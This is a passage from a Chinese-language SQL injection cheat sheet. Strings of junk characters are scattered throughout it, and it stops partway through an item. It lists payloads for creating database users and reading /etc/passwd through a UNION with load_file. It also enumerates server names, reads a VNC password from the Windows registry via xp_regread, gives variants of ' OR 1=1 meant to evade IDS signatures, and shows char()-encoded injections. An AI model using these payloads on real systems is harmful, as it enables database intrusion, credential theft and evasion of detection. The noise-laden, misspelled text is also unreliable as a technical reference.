/ W; D# q. J0 @, q: p3 k4 ^CRATE USER name IDENTIFIED BY ‘pass123′% O6 a0 |7 y/ l0 Q, U
& i7 s" ^8 u; e4 `) g2 K3 v
$ x v6 h8 H' V! m! E: l
' l9 l# r3 |- L3 T% w, b; NPostgres (requires Unix account) ) W1 v& w( C; S. ]" _, U$ F/ V7 q5 T" J* d2 w p
CRATE USER name WITH PASSWORD ‘pass123′# {. J; k! n2 C0 ^
' t }) j1 q5 ^
0 j) G \% J, a5 c1 Y+ S7 n! L4 ~' ~7 b1 p
Oracle 1 o" h1 ]8 ?4 Y+ ~8 }* u4 z " Z1 r4 Z$ M! x7 E3 ]% h5 D, bCRATE USER name IDENTIFIED BY pass123 3 n3 g7 L. W# O0 Y% s/ ? ; n( O1 t5 ?' A( s5 [ W( Z TEMPORARY TABLESPACE temp0 {/ ]( C/ u; f' o& m: T7 \: F( }
) _" o9 z& U# F3 Q DEFAULT TABLESPACE users;# x& e; C# P c" G( F& f( z
7 {% X% a+ n! k: ^GRANT CONNECT TO name; ; Y2 n" f5 O) i/ u# Q$ z x/ F4 U8 A% ?! E( P' F
GRANT RESOURCE TO name; - B. Z A$ h1 e 0 Z2 F. e9 A9 Y5 v, S1 H8 J; Z2 l' c c" a& j; `4 o
( L8 }% e# T& y/ {7、MYSQL交互查询5 c2 U! o0 i, Q7 E
, t' Z; Z+ G) b( \: F) E: Z6 t. q使用Union查询,暴出文件代码,如下: - V$ H% _* @4 S+ u& U7 |- o+ }" a* L
- ‘ union select 1,load_file(’/etc/passwd’),1,1,1; # t$ k% T! D5 G. ~/ b+ P5 I ' `9 x! p* ?; A: R i$ s' u: B. w( @( G/ D1 J: C
0 j4 {! V" a! {' f0 z# a+ z, n8、系统服务名和配置 8 S# Y+ G% \; D9 G" T9 u) l9 h. C/ z: \
- ‘ and 1 in (select @@servername)–2 k0 U4 C# o! _9 `9 h$ u
2 o' ~; E) v7 n9 K. j% {8 i- ‘ and 1 in (select servername from master.sysservers)–3 d! w4 Z' y% W( s7 U/ e
/ f8 J/ }2 t3 p$ n( L
# E: a+ B; i- Z3 u u
4 V8 z \8 F! x7 d; Z! t
9、找到VNC密码(注册表) & ^$ V. s$ p: M- i1 ? $ N7 N2 i: e' ?! ~$ ]) r实验语句如下: w3 G8 w" u7 s, N
|8 ^) V5 @1 b8 g
- ‘; declare @out binary(8) ) t4 _) [. {$ v) t- f% {9 a$ x7 v/ @: n# `1 A
- exec master..xp_regread . M k1 T1 f* j. e; ] . M+ e8 U0 ~: B$ ?- @rootkey = ‘HKEY_LOCAL_MACHINE’,) D4 B6 E, r: z) U
0 R" k1 U6 p* B/ Y" x
- @key = ‘SOFTWARE\ORL\WinVNC3\Default’,( L8 V& ] h! F0 Y: C t
. X' n& c. x# i6 O
- @value_name=’password’,4 L% K* D( R; c1 O( X* U
( S/ o$ H1 [7 t+ y* ^- select cast (@out as bigint) as x into TEMP– 0 J% L1 r# I: M2 a ( ^0 A. c0 ]1 n- ‘ and 1 in (select cast(x as varchar) from temp)–+ B" D8 @$ C& }
% S* N2 E. v* R! Z' i
& Q) ~& M5 S( r, u l& I% ~+ a 8 v+ r& s5 U: R) P l10、避开IDS检测 + K! g# o' T1 @. r6 [( }; M. x0 }6 P7 |7 }
Evading ‘ OR 1=1 Signature( X( L( \9 b5 ^: p8 Y: A
0 b' f; P+ s# _7 t
8 C/ }. s1 u$ d" x 5 E n; P! O3 ~7 v+ r) v' t- P- ‘ OR ‘unusual’ = ‘unusual’. {4 K+ M: `- d. Z
$ E$ m( K! }- D, G8 P! e4 u* s
- ‘ OR ’something’ = ’some’+'thing’. D* z1 _7 e9 @/ v9 P4 D# p
0 M# a& ?% G( f- ~* y
- ‘ OR ‘text’ = N’text’ * ?% k: V$ |; v, D( ? 7 P2 O# w" W5 f3 a- T# |- D- ‘ OR ’something’ like ’some%’ 6 | j+ E+ p/ c " G. N" d# e$ @, I- ‘ OR 2 > 1 I a7 t, e/ L) @. n/ ~* P# T! e
% d- o. ?3 d9 y4 Z( `( a) C6 W
- ‘ OR ‘text’ > ‘t’7 g4 Z! S3 V; h$ F8 V" |
4 l) _! ?+ E: ~" F& T- ‘ OR ‘whatever’ in (’whatever’)* R; R' ]2 p& s7 l0 d. p& W
6 F" x; W- q5 x1 d. e0 y! I( B" ?- ‘ OR 2 BETWEEN 1 and 3: H! ], G7 r% y# b& m6 M
7 v$ R4 ]4 I* g# f9 a4 r# R( x8 t: Y1 |% C- p: ]$ s x
/ | i8 N! B- ]' V9 x. J
11、MYSQL中使用char()函数2 C- L; b! q6 y4 }7 P5 F- P
2 m, m5 g# C! b$ |
不带引号的注射,例如: (string = “%”):- l, X; Q: ~1 h/ i9 o5 X' B
1 n3 h: ?$ w6 m( r1 M# P# W8 \
–> ‘ or username like char(37); ( g2 j f* Y/ D+ Q8 w; y3 K# B( ^2 T
带引号的注射,例如: (string=”root”):5 B5 W6 H0 J5 F S% j
# X" M& V y7 `7 B
–> ‘ union select * from users where login = char(114,111,111,116); + v" c: w4 W# P1 e! [ p6 S- z9 f, y
在 unions中使用load files 函数,例如:(string = “/etc/passwd”):. l8 P: t; Q! C9 O& K% H) @